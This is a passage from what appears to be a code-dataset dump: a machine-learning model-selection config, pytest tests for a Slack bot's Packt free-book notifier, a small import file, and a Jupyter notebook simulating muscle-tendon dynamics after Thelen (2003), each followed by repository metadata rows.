TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, transformer_type=TransformerType.transform)
]
model_selection_mlknn = [MLkNN(k=1, s=1.0, ignore_first_neighbours=0),
MLkNN(k=3, s=1.0, ignore_first_neighbours=0),
MLkNN(k=10, s=1.0, ignore_first_neighbours=0),
MLkNN(k=20, s=1.0, ignore_first_neighbours=0),
MLkNN(k=1, s=0.5, ignore_first_neighbours=0),
MLkNN(k=3, s=0.5, ignore_first_neighbours=0),
MLkNN(k=10, s=0.5, ignore_first_neighbours=0),
MLkNN(k=20, s=0.5, ignore_first_neighbours=0),
MLkNN(k=1, s=0.7, ignore_first_neighbours=0),
MLkNN(k=3, s=0.7, ignore_first_neighbours=0),
MLkNN(k=10, s=0.7, ignore_first_neighbours=0),
MLkNN(k=20, s=0.7, ignore_first_neighbours=0)
]
model_selection_rakel = [
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam')),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'), labelset_size=5),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam')),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam'), labelset_size=5),
RakelD(MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam')),
RakelD(MLPClassifier(hidden_layer_sizes=(2000, 100), learning_rate='adaptive', solver='adam'), labelset_size=5),
RakelD(MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam')),
RakelD(MLPClassifier(hidden_layer_sizes=(2000), learning_rate='adaptive', solver='adam'), labelset_size=5),
RakelD(base_classifier=GaussianNB(), base_classifier_require_dense=[True, True], labelset_size=3),
RakelD(base_classifier=GaussianNB(), base_classifier_require_dense=[True, True], labelset_size=5),
RakelD(base_classifier=GaussianNB(), base_classifier_require_dense=[True, True], labelset_size=7)
]
model_selection_wavelets = [
TransformerFactory.build_wavelet(),
TransformerFactory.build_wavelet(drop_cA=True)
]
model_selection_delay_embeddings = [
TransformerFactory.build_delay_embedding(delay_in_seconds=30, dimension=6),
TransformerFactory.build_delay_embedding(delay_in_seconds=32, dimension=8),
TransformerFactory.build_delay_embedding(delay_in_seconds=6, dimension=8),
TransformerFactory.build_delay_embedding(delay_in_seconds=12, dimension=8)
]
cv_signal2vec = [TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)]
cv_signal2vec_clf = [MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive',
solver='adam', activation='logistic')]
cv_boss_clf = [MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')]
cv_boss = [TransformerFactory.build_pyts_boss(word_size=2, n_bins=2, window_size=10,
norm_mean=False, norm_std=False)]
state_of_the_art = {
SIGNAL2VEC : {
CLF_MODELS : [MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive',
solver='adam', activation='logistic')],
TRANSFORMER_MODELS: [TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)]
},
WAVELETS : {
CLF_MODELS : [MLkNN(ignore_first_neighbours=0, k=3, s=1.0),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive',
solver='adam'), labelset_size=5)],
TRANSFORMER_MODELS: [TransformerFactory.build_wavelet(), TransformerFactory.build_wavelet()]
},
TIME_DELAY_EMBEDDING: {
CLF_MODELS : [
MLkNN(ignore_first_neighbours=0, k=3, s=1.0),
RakelD(MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive',
solver='adam'), labelset_size=5)
],
TRANSFORMER_MODELS: [TransformerFactory.build_delay_embedding(delay_in_seconds=30, dimension=6),
TransformerFactory.build_delay_embedding(delay_in_seconds=30, dimension=6)
]
},
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')],
TRANSFORMER_MODELS: [TransformerFactory.build_pyts_boss(word_size=2, n_bins=4, window_size=10,
norm_mean=False, norm_std=False)]
}
}
| 57.540373
| 120
| 0.641429
| 5,005
| 46,320
| 5.582617
| 0.027173
| 0.148993
| 0.109087
| 0.131813
| 0.965606
| 0.964246
| 0.958734
| 0.956694
| 0.956265
| 0.933109
| 0
| 0.048154
| 0.253087
| 46,320
| 804
| 121
| 57.61194
| 0.759459
| 0
| 0
| 0.71465
| 0
| 0
| 0.044063
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011465
| 0
| 0.011465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44cf2f800a067a76883efd6befb27bcd48e634b6
| 3,964
|
py
|
Python
|
tests/apps/info/packtpub_test.py
|
item4/yui
|
8628d0d54b94ada3cbe7d1b0f624063258bad10a
|
[
"MIT"
] | 36
|
2017-06-12T01:09:46.000Z
|
2021-01-31T17:57:41.000Z
|
tests/apps/info/packtpub_test.py
|
item4/yui
|
8628d0d54b94ada3cbe7d1b0f624063258bad10a
|
[
"MIT"
] | 145
|
2017-06-21T13:31:29.000Z
|
2021-06-20T01:01:30.000Z
|
tests/apps/info/packtpub_test.py
|
item4/yui
|
8628d0d54b94ada3cbe7d1b0f624063258bad10a
|
[
"MIT"
] | 21
|
2017-07-24T15:53:19.000Z
|
2021-12-23T04:18:31.000Z
|
from freezegun import freeze_time
import pytest
from yui.apps.info.packtpub import PACKTPUB_URL
from yui.apps.info.packtpub import auto_packtpub_dotd
from yui.apps.info.packtpub import packtpub_dotd
from yui.utils import json
from yui.utils.datetime import datetime
from ...util import FakeBot
@pytest.mark.asyncio
@freeze_time(datetime(2018, 10, 7))
async def test_no_packtpub_dotd(bot, response_mock):
response_mock.get(
'https://services.packtpub.com/free-learning-v1/offers'
'?dateFrom=2018-10-07T00:00:00.000Z&dateTo=2018-10-08T00:00:00.000Z',
body=json.dumps({'data': []}),
headers={'Content-Type': 'application/json'},
)
bot.add_channel('C1', 'general')
bot.add_user('U1', 'item4')
event = bot.create_message('C1', 'U1')
await packtpub_dotd(bot, event)
said = bot.call_queue.pop(0)
assert said.method == 'chat.postMessage'
assert said.data['channel'] == 'C1'
assert said.data['text'] == '오늘은 PACKT Book의 무료책이 없는 것 같아요'
@pytest.mark.asyncio
@freeze_time(datetime(2018, 10, 7))
async def test_packtpub_dotd(bot, response_mock):
product_id = '11223344'
title = 'test book'
image_url = 'test url'
response_mock.get(
'https://services.packtpub.com/free-learning-v1/offers'
'?dateFrom=2018-10-07T00:00:00.000Z&dateTo=2018-10-08T00:00:00.000Z',
body=json.dumps({'data': [{'productId': product_id}]}),
headers={'Content-Type': 'application/json'},
)
response_mock.get(
f'https://static.packt-cdn.com/products/{product_id}/summary',
body=json.dumps({'title': title, 'coverImage': image_url}),
headers={'Content-Type': 'application/json'},
)
bot.add_channel('C1', 'general')
bot.add_user('U1', 'item4')
event = bot.create_message('C1', 'U1')
await packtpub_dotd(bot, event)
said = bot.call_queue.pop(0)
assert said.method == 'chat.postMessage'
assert said.data['channel'] == 'C1'
assert said.data['text'] == '오늘자 PACKT Book의 무료책이에요!'
attachments = said.data['attachments']
assert len(attachments) == 1
assert attachments[0]['fallback'] == f'{title} - {PACKTPUB_URL}'
assert attachments[0]['title'] == title
assert attachments[0]['title_link'] == PACKTPUB_URL
assert attachments[0]['text'] == (
f'오늘의 Packt Book Deal of The Day: {title} - {PACKTPUB_URL}'
)
assert attachments[0]['image_url'] == image_url
@pytest.mark.asyncio
@freeze_time(datetime(2018, 10, 7))
async def test_auto_packtpub_dotd(bot_config, response_mock):
assert auto_packtpub_dotd.cron.spec == '5 9 * * *'
product_id = '11223344'
title = 'test book'
image_url = 'test url'
response_mock.get(
'https://services.packtpub.com/free-learning-v1/offers'
'?dateFrom=2018-10-07T00:00:00.000Z&dateTo=2018-10-08T00:00:00.000Z',
body=json.dumps({'data': [{'productId': product_id}]}),
headers={'Content-Type': 'application/json'},
)
response_mock.get(
f'https://static.packt-cdn.com/products/{product_id}/summary',
body=json.dumps({'title': title, 'coverImage': image_url}),
headers={'Content-Type': 'application/json'},
)
bot_config.CHANNELS = {
'general': 'general',
}
bot = FakeBot(bot_config)
bot.add_channel('C1', 'general')
await auto_packtpub_dotd(bot)
said = bot.call_queue.pop(0)
assert said.method == 'chat.postMessage'
assert said.data['channel'] == 'C1'
assert said.data['text'] == '오늘자 PACKT Book의 무료책이에요!'
attachments = said.data['attachments']
assert len(attachments) == 1
assert attachments[0]['fallback'] == f'{title} - {PACKTPUB_URL}'
assert attachments[0]['title'] == title
assert attachments[0]['title_link'] == PACKTPUB_URL
assert attachments[0]['text'] == (
f'오늘의 Packt Book Deal of The Day: {title} - {PACKTPUB_URL}'
)
assert attachments[0]['image_url'] == image_url
| 33.880342
| 77
| 0.656408
| 525
| 3,964
| 4.832381
| 0.209524
| 0.067008
| 0.07095
| 0.06622
| 0.879385
| 0.849428
| 0.837998
| 0.808829
| 0.808829
| 0.808829
| 0
| 0.053329
| 0.181635
| 3,964
| 116
| 78
| 34.172414
| 0.72873
| 0
| 0
| 0.729167
| 0
| 0.03125
| 0.3055
| 0.04995
| 0
| 0
| 0
| 0
| 0.229167
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44d6dcbf7e04185aedfb4e86782b25cb084a34c7
| 102
|
py
|
Python
|
test/__init__.py
|
zosiakropka/rich-text-py
|
a317da6cbd9e0d06e98e2cfcf43f9c3b0c5b091b
|
[
"MIT"
] | 1
|
2016-04-06T22:46:47.000Z
|
2016-04-06T22:46:47.000Z
|
test/__init__.py
|
zosiakropka/rich-text-py
|
a317da6cbd9e0d06e98e2cfcf43f9c3b0c5b091b
|
[
"MIT"
] | null | null | null |
test/__init__.py
|
zosiakropka/rich-text-py
|
a317da6cbd9e0d06e98e2cfcf43f9c3b0c5b091b
|
[
"MIT"
] | null | null | null |
from test_attributes import *
from test_iterator import *
from test_iz import *
from test_op import *
| 20.4
| 29
| 0.803922
| 16
| 102
| 4.875
| 0.4375
| 0.410256
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 102
| 4
| 30
| 25.5
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
789b7c858bdc94d1e217ec4c670d2b9c2d8fb55a
| 82,789
|
py
|
Python
|
courses/modsim2018/tasks/Tasks_For&During_Lecture13/CodeOfFriend.py
|
raissabthibes/bmc
|
840800fb94ea3bf188847d0771ca7197dfec68e3
|
[
"MIT"
] | null | null | null |
courses/modsim2018/tasks/Tasks_For&During_Lecture13/CodeOfFriend.py
|
raissabthibes/bmc
|
840800fb94ea3bf188847d0771ca7197dfec68e3
|
[
"MIT"
] | null | null | null |
courses/modsim2018/tasks/Tasks_For&During_Lecture13/CodeOfFriend.py
|
raissabthibes/bmc
|
840800fb94ea3bf188847d0771ca7197dfec68e3
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# Task 12 - Motor Control\n",
"### Introduction to modeling and simulation of human movement\n",
"https://github.com/BMClab/bmc/blob/master/courses/ModSim2018.md"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Desiree Miraldo \n",
"Renato Watanabe\n",
"\n",
"\n",
"* Based on task for Lecture 11 (+ muscle activation dynamics + pennation angle):\n",
"\n",
"Change the derivative of the contractile element length function. The new function must compute the derivative according to the article from Thelen (2003) (Eqs. (1), (2), (6) and (7)):\n",
"\n",
" Thelen D; Adjustment of muscle mechanics model parameters to simulate dynamic contractions in older adults (2003)"
]
},
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"import numpy as np\n",
"#import pandas as pd\n",
"import matplotlib.pyplot as plt\n",
"import math\n",
"\n",
"%matplotlib notebook"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Muscle properties"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"Lslack = .223\n",
"Umax = .04\n",
"Lce_o = .093 #optmal l\n",
"width = .63#*Lce_o\n",
"Fmax = 7400\n",
"a = 0\n",
"u = 0.5\n",
"#b = .25*10#*Lce_o "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Initial conditions"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"Lnorm_ce = .087/Lce_o #norm\n",
"t0 = 0\n",
"tf = 5\n",
"h = 1e-3"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"t = np.arange(t0,tf,h)\n",
"F = np.empty(t.shape)\n",
"Fkpe = np.empty(t.shape)\n",
"FiberLen = np.empty(t.shape)\n",
"TendonLen = np.empty(t.shape)\n",
"a_dynamics = np.empty(t.shape)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Simulation - Series"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"for i in range (len(t)):\n",
" #ramp\n",
" if t[i]<=1:\n",
" Lm = 0.31\n",
" elif t[i]>1 and t[i]<2:\n",
" Lm = .31 + .1*(t[i]-1)\n",
" #print(Lm)\n",
" \n",
" #shortening at 4cm/s\n",
" Lsee = Lm - Lce\n",
" \n",
" if Lsee<Lslack: \n",
" F[i] = 0\n",
" else: \n",
" F[i] = Fmax*((Lsee-Lslack)/(Umax*Lslack))**2\n",
" \n",
" \n",
" #isometric force at Lce from CE force length relationship\n",
" F0 = max([0, Fmax*(1-((Lce-Lce_o)/width)**2)])\n",
" \n",
" #calculate CE velocity from Hill's equation\n",
" if F[i]>F0: print('Error: cannot do eccentric contractions')\n",
" \n",
" Lcedot = -b*(F0-F[i])/(F[i]+a) #vel is negative for shortening\n",
" \n",
" # --- Euler integration step\n",
" Lce += h*Lcedot\n",
"\n",
" "
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [],
"source": [
"def TendonForce (Lnorm_see,Lslack, Lce_o):\n",
" '''\n",
" Compute tendon force\n",
"\n",
" Inputs:\n",
" Lnorm_see = normalized tendon length\n",
" Lslack = slack length of the tendon (non-normalized)\n",
" Lce_o = optimal length of the fiber\n",
" \n",
" Output:\n",
" Fnorm_tendon = normalized tendon force\n",
" \n",
" '''\n",
" Umax = .04\n",
" \n",
" if Lnorm_see<Lslack/Lce_o: \n",
" Fnorm_tendon = 0\n",
" else: \n",
" Fnorm_tendon = ((Lnorm_see-Lslack/Lce_o)/(Umax*Lslack/Lce_o))**2\n",
" \n",
" return Fnorm_tendon"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [],
"source": [
"def ParallelElementForce (Lnorm_ce):\n",
" '''\n",
" Compute parallel element force\n",
" \n",
" Inputs:\n",
" Lnorm_ce = normalized contractile element length\n",
" \n",
" Output:\n",
" Fnorm_kpe = normalized parallel element force\n",
"\n",
" '''\n",
" Umax = 1\n",
" \n",
" if Lnorm_ce< 1: \n",
" Fnorm_kpe = 0\n",
" else: \n",
" Fnorm_kpe = ((Lnorm_ce-1)/(Umax*1))**2 \n",
" \n",
" return Fnorm_kpe"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [],
"source": [
"def ForceLengthCurve (Lnorm_ce,width):\n",
" F0 = max([0, (1-((Lnorm_ce-1)/width)**2)])\n",
" return F0"
]
},
{
"cell_type": "markdown",
"metadata": {
"collapsed": true
},
"source": [
"def ContractileElementDot(F0, Fnorm_CE, a, b):\n",
" \n",
" '''\n",
" Compute Contractile Element Derivative\n",
"\n",
" Inputs:\n",
" F0 = Force-Length Curve\n",
" Fce = Contractile element force\n",
" \n",
" Output:\n",
" Lnorm_cedot = normalized contractile element length derivative\n",
"\n",
" '''\n",
" \n",
" if Fnorm_CE>F0: print('Error: cannot do eccentric contractions')\n",
" \n",
" Lnorm_cedot = -b*(F0-Fnorm_CE)/(Fnorm_CE + a) #vel is negative for shortening\n",
" \n",
" return Lnorm_cedot"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [],
"source": [
"def ContractileElementDot(F0, Fnorm_CE, a):\n",
" \n",
" '''\n",
" Compute Contractile Element Derivative\n",
"\n",
" Inputs:\n",
" F0 = Force-Length Curve\n",
" Fce = Contractile element force\n",
" \n",
" Output:\n",
" Lnorm_cedot = normalized contractile element length derivative\n",
"\n",
" '''\n",
" \n",
" FMlen = 1.4 # young adults\n",
" Vmax = 10 # young adults\n",
" Af = 0.25 #force-velocity shape factor\n",
" \n",
" Fnorm_CE = min(FMlen*a*F0 - 0.001, Fnorm_CE)\n",
" \n",
" if Fnorm_CE > a*F0:\n",
" \n",
" b = ((2 + 2/Af)*(a*F0*FMlen - Fnorm_CE))/(FMlen-1)\n",
" \n",
" elif Fnorm_CE <= a*F0:\n",
" \n",
" b = a*F0 + Fnorm_CE/Af\n",
" \n",
" Lnorm_cedot = (.25 + .75*a)*Vmax*((Fnorm_CE - a*F0)/b)\n",
" \n",
" return Lnorm_cedot"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"def ContractileElementForce(Fnorm_tendon,Fnorm_kpe, alpha):\n",
" '''\n",
" Compute Contractile Element force\n",
"\n",
" Inputs:\n",
" Fnorm_tendon = normalized tendon force\n",
" Fnorm_kpe = normalized parallel element force\n",
" \n",
" Output:\n",
" Fnorm_CE = normalized contractile element force\n",
" '''\n",
" Fnorm_CE = Fnorm_tendon/np.cos(alpha) - Fnorm_kpe\n",
" return Fnorm_CE"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [],
"source": [
"def tendonLength(Lm,Lce_o,Lnorm_ce, alpha):\n",
" '''\n",
" Compute tendon length\n",
" \n",
" Inputs:\n",
" Lm = \n",
" Lce_o = optimal length of the fiber\n",
" Lnorm_ce = normalized contractile element length\n",
" \n",
" Output:\n",
" Lnorm_see = normalized tendon length \n",
" '''\n",
" Lnorm_see = Lm/Lce_o - Lnorm_ce*np.cos(alpha)\n",
" \n",
" return Lnorm_see"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"def activation(a,u,dt):\n",
" '''\n",
" Compute activation\n",
" \n",
" Inputs:\n",
" u = idealized muscle excitation signal, 0 <= u <= 1\n",
" a = muscular activation\n",
" dt = time step\n",
" \n",
" Output:\n",
" a = muscular activation \n",
" '''\n",
" \n",
" tau_deact = 50e-3 #young adults\n",
" tau_act = 15e-3\n",
" \n",
" if u>a:\n",
" tau_a = tau_act*(0.5+1.5*a)\n",
" elif u <=a:\n",
" tau_a = tau_deact/(0.5+1.5*a)\n",
" \n",
" #-------\n",
" dadt = (u-a)/tau_a # euler\n",
" \n",
" a += dadt*dt\n",
" #-------\n",
" return a"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Simulation - Parallel"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [],
"source": [
"#Normalizing\n",
"alpha = 25*np.pi/180\n",
"for i in range (len(t)):\n",
" #ramp\n",
" if t[i]<=1:\n",
" Lm = 0.31\n",
" elif t[i]>1 and t[i]<2:\n",
" Lm = .31 - .04*(t[i]-1)\n",
" #print(Lm)\n",
" \n",
" #shortening at 4cm/s\n",
" u = 0.7 + 0.2*np.sin(np.pi*t[i])\n",
" \n",
" Lnorm_see = tendonLength(Lm,Lce_o,Lnorm_ce, alpha)\n",
"\n",
" Fnorm_tendon = TendonForce (Lnorm_see,Lslack, Lce_o) \n",
" \n",
" Fnorm_kpe = ParallelElementForce (Lnorm_ce) \n",
" \n",
" #isometric force at Lce from CE force length relationship\n",
" F0 = ForceLengthCurve (Lnorm_ce,width)\n",
" \n",
" Fnorm_CE = ContractileElementForce(Fnorm_tendon,Fnorm_kpe, alpha) #Fnorm_CE = ~Fm\n",
" \n",
" #computing activation\n",
" a = activation(a,u,h)\n",
" \n",
" #calculate CE velocity from Hill's equation \n",
" Lnorm_cedot = ContractileElementDot(F0, Fnorm_CE,a)\n",
" \n",
" # --- Euler integration step\n",
" Lnorm_ce += h*Lnorm_cedot\n",
"\n",
" \n",
" F[i] = Fnorm_tendon*Fmax\n",
" Fkpe[i] = Fnorm_kpe*Fmax\n",
" FiberLen[i] = Lnorm_ce*Lce_o\n",
" TendonLen[i] = Lnorm_see*Lce_o\n",
" a_dynamics[i] = a\n",
" "
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Plots "
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {
"scrolled": false
},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"/opt/miniconda3/lib/python3.6/site-packages/matplotlib/axes/_axes.py:545: UserWarning: No labelled objects found. Use label='...' kwarg on individual plots.\n",
" warnings.warn(\"No labelled objects found. \"\n"
]
},
{
"data": {
"image/png": "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